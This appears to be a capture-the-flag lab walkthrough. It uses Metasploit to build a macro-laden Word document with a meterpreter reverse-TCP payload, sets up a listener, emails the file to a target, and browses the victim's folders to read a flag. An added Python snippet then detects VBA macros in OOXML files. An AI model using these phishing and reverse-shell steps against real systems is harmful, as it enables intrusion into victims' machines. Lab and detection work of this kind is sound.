MACRO EMBEDDING DOCX
root@oco:~$ msfconsole
root@oco:~$ set payload windows/meterpreter/reverse_tcp
* this payload connects to the specified host & creates a reverse shell
root@oco:~$ use exploit/multi/fileformat/office_word_macro
* use the office_word_macro module to create a document with a macro
root@oco:~$ set LHOST {attackerIP}
root@oco:~$ set LPORT {attackerIncomingConnectionPort}
root@oco:~$ show options
root@oco:~$ {run | exploit}
* this generates a macro & embeds it in a document
root@oco:~$ exit
root@oco:~$ msfconsole
root@oco:~$ use multi/handler
* this handles incoming connections
root@oco:~$ set payload windows/meterpreter/reverse_tcp
* setting the same payload on the listener ensures the handler is compatible with the payload used when creating the malicious macro
root@oco:~$ set LHOST {attackerIP}
* should be the same as the one used when creating the malicious document
root@oco:~$ set LPORT {listeningPortNumber}
root@oco:~$ show options
root@oco:~$ run
* send the malicious macro-enabled docx file to the target via email & wait for them to open the file
meterpreter > dir c:\\users\\
Listing: c:\users\
==================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 12288 dir 2024-12-10 22:46:16 +0000 Administrator
040777/rwxrwxrwx 0 dir 2018-09-15 08:28:48 +0100 All Users
040555/r-xr-xr-x 8192 dir 2021-03-17 14:58:07 +0000 Default
040777/rwxrwxrwx 0 dir 2018-09-15 08:28:48 +0100 Default User
040555/r-xr-xr-x 4096 dir 2018-12-12 07:45:15 +0000 Public
100666/rw-rw-rw- 174 fil 2018-09-15 08:16:48 +0100 desktop.ini
meterpreter > cd c:\\users\\administrator
meterpreter > dir
Listing: c:\users\administrator
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040555/r-xr-xr-x 4096 dir 2024-11-12 04:42:01 +0000 Desktop
040555/r-xr-xr-x 4096 dir 2024-05-16 03:44:57 +0100 Documents
040555/r-xr-xr-x 4096 dir 2024-11-12 04:07:46 +0000 Downloads
meterpreter > cd Desktop
meterpreter > dir
Listing: c:\users\administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 527 fil 2016-06-21 16:36:17 +0100 EC2 Feedback.website
100666/rw-rw-rw- 554 fil 2016-06-21 16:36:23 +0100 EC2 Microsoft Windows Guide.website
100666/rw-rw-rw- 282 fil 2021-03-17 15:13:27 +0000 desktop.ini
100666/rw-rw-rw- 23 fil 2024-11-12 03:42:45 +0000 flag.txt
meterpreter > cat flag.txt
* THM{PHISHING_CHRISTMAS}
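
A defender-side check for the kind of document generated above, as an added example that is not part of the original notes: it inspects a Word file's OOXML zip container for an embedded VBA project and macro-enabled content types, regardless of the file extension. The sample files are constructed in memory, and `macro_indicators` and `_build_sample` are hypothetical names.

```python
import io
import zipfile

# Lower-cased content types that mark a macro-enabled Word package or a VBA part.
MACRO_CONTENT_TYPES = (
    "application/vnd.ms-word.document.macroenabled.main+xml",
    "application/vnd.ms-office.vbaproject",
)


def macro_indicators(data):
    """Return reasons to treat an OOXML Word file as macro-bearing ([] if none)."""
    try:
        pkg = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        # Legacy binary .doc files are OLE containers and need a different parser.
        raise ValueError("not an OOXML (zip) container")
    findings = []
    with pkg:
        names = pkg.namelist()
        for name in names:
            if name.lower().endswith("vbaproject.bin"):
                findings.append("VBA project part: " + name)
        if "[Content_Types].xml" in names:
            types = pkg.read("[Content_Types].xml").decode("utf-8", "replace").lower()
            for ct in MACRO_CONTENT_TYPES:
                if ct in types:
                    findings.append("macro content type: " + ct)
    return findings


def _build_sample(with_macro):
    """Constructed sample: a minimal zip holding only the parts this check reads."""
    main = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_macro else
            "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    types = '<Types><Override PartName="/word/document.xml" ContentType="%s"/></Types>' % main
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", types)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"placeholder bytes, not a real VBA project")
    return buf.getvalue()


if __name__ == "__main__":
    for label, flag in (("plain", False), ("macro-enabled", True)):
        print(label, macro_indicators(_build_sample(flag)))
```

A non-empty result is a reason to quarantine the attachment or strip the macro before delivery; an empty result only means no VBA project was found in the package.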